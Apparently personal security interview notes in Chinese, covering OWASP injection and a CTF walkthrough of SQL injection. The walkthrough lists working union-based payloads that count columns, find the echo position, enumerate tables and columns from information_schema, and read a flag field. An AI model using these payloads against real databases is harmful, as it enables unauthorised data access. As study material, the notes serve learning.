1. 程式人生 > 其它 >【個人用 | 更新中】資訊安全面試資料整理

【個人用 | 更新中】資訊安全面試資料整理

這篇部落格是個人用於面試的資料整理,方便個人查閱使用。

安全知識部分

OWASP TOP 10

參考連結

https://www.jianshu.com/p/ba20f5f8f878
https://zhuanlan.zhihu.com/p/393635352

A1 Injection 注入攻擊

如參考資料中所說,注入攻擊有很多方式,比如 SQL、OS 命令、ORM、LDAP 和表示式語言或者 OGNL 注入等等。

這裡著重看一下 SQL 注入 攻擊。

SQL 注入

原理

Web 應用程式對使用者輸入資料的合法性沒有判斷,攻擊者可以在 Web 應用程式中事先定義好的查詢語句的結尾上新增額外的 SQL 語句,以此來實現欺騙資料庫伺服器執行非授權的任意查詢,從而進一步得到相應的資料資訊。

利用

這裡以一道 SQL 注入的 CTF 題目為例。

判斷回顯欄位個數:

1' order by 4#

確定回顯位置:

-1' union select 1, 2, 3, 4#

獲取表名:

-1' union select 1, group_concat(table_name), 3, 4 from information_schema.tables where table_schema=database()#

查詢表中欄位名:

-1' union select 1, group_concat(column_name), 3, 4 from information_schema.columns where table_name='fl4g'#

查詢欄位內容:

-1' union select 1, skctf_flag, 3, 4 from fl4g#